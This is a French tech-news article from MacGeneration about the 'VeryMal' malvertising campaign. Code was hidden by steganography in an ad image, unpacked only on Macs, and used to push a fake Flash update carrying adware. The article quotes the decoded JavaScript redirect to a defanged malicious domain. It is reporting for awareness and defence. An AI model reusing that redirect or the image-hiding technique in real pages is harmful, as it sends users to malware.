Ouvrir le menu principal

MacGeneration

Recherche

Une campagne sophistiquée de malvertising a visé les utilisateurs de Mac


Vous naviguez tranquillement sur le web quand, tout à coup, une nouvelle page s’ouvre et vous informe que votre version de Flash doit être mise à jour. Qu’est-ce que vous faites ? Si vous lisez MacGeneration, vous savez qu’il s’agit d’un traquenard et vous fermez l’onglet, mais les utilisateurs moins avertis risquent de télécharger un logiciel malveillant.

Les chercheurs en sécurité de Confiant ont découvert une campagne de malvertising récente visant les utilisateurs de Mac. Le malvertising, c’est l’exploitation de la publicité en ligne (advertising) pour diffuser des logiciels malveillants (malware).

La page invitant à télécharger le faux Flash.

Le principe n’est pas nouveau, mais cette campagne retient l’attention par son ampleur et son perfectionnement. Une image servie 5 millions de fois dans un cadre publicitaire servait de support pour de la stéganographie, c’est-à-dire que sous son apparence inoffensive, elle dissimulait du code servant à duper l’internaute.

Le malandrin VeryMal a créé un bloc canvas (un type d’élément HTML5) qui vérifiait si l’ordinateur avait des polices Apple installées et le cas échéant convertissait chaque pixel de l’image en caractère alphanumérique. Ce qui donnait au bout du compte le code suivant :

top.location.href =’hxxp://veryield-malyst.com/’ + volton + ‘?var1=’ + wsw;

L’internaute était alors dirigé vers une page l’invitant à télécharger une fausse version de Flash qui se trouvait être un logiciel infestant le Mac de pubs.

Des garde-fous limitent heureusement le nombre de victimes potentielles. Les navigateurs peuvent bloquer les téléchargements suspects (la page malveillante indiquait justement comment autoriser le téléchargement) et macOS demande une confirmation avant d’installer un logiciel venant du web. Le conseil est le même que d’habitude : ne téléchargez que ce dont vous avez besoin (vous pouvez sans doute vous passer de Flash maintenant) et à partir de sites de confiance uniquement.

Source :

ChatGPT sur Mac : l’app cessera de fonctionner ce soir sans mise à jour

12/06/2026 à 22:15

• 0


SpaceX entre en bourse : de For All Mankind à l’Homme qui valait un trillion

12/06/2026 à 21:15

• 56


macOS 27 permet d'empêcher le bouton PlayStation ou Xbox de lancer l'app Jeux

12/06/2026 à 18:15

• 4


iOS 27 : une douzaine d’applications supplémentaires adoptent l’orientation paysage

12/06/2026 à 18:07

• 20


RAMpocalypse : les nouveaux VPS d’OVHcloud perdent beaucoup d’attrait

12/06/2026 à 16:21

• 20


Bon plan : le pack MX Master 3S et MX Keys S pour Mac tombe à 150 € (-21 %)

12/06/2026 à 15:49

• 0


Prise en main de Siri AI sous macOS 27 : enfin un Siri à la hauteur ?

12/06/2026 à 15:19

• 11


OpenAI veut populariser Codex avec un système de parrainage et des réinitialisations de quotas

12/06/2026 à 12:27

• 8


Bouygues Telecom fait payer son app b.tv pour Apple TV, 5 €/mois

12/06/2026 à 12:21

• 62


Natation : quand les lunettes viennent combler les lacunes de l’Apple Watch

12/06/2026 à 12:21

• 33


Logitech Mobi Fold : la souris qui se plie pour mieux voyager

12/06/2026 à 10:44

• 19


Bluetooth 6 : l'alternative à la localisation précise UWB arrive sur les iPhone avec puce N1 et iOS 27

12/06/2026 à 10:30

• 1


NASync DXP GT : Ugreen monte en gamme avec deux NAS jusqu'à 144 To

12/06/2026 à 09:58

• 16


Siri AI sera-t-il disponible un jour en Europe ?

12/06/2026 à 08:44

• 169


Apple ne veut pas louper le train de l'IA agentique

12/06/2026 à 08:44

• 28


iOS 27 : les petites nouveautés de Santé

12/06/2026 à 08:43

• 10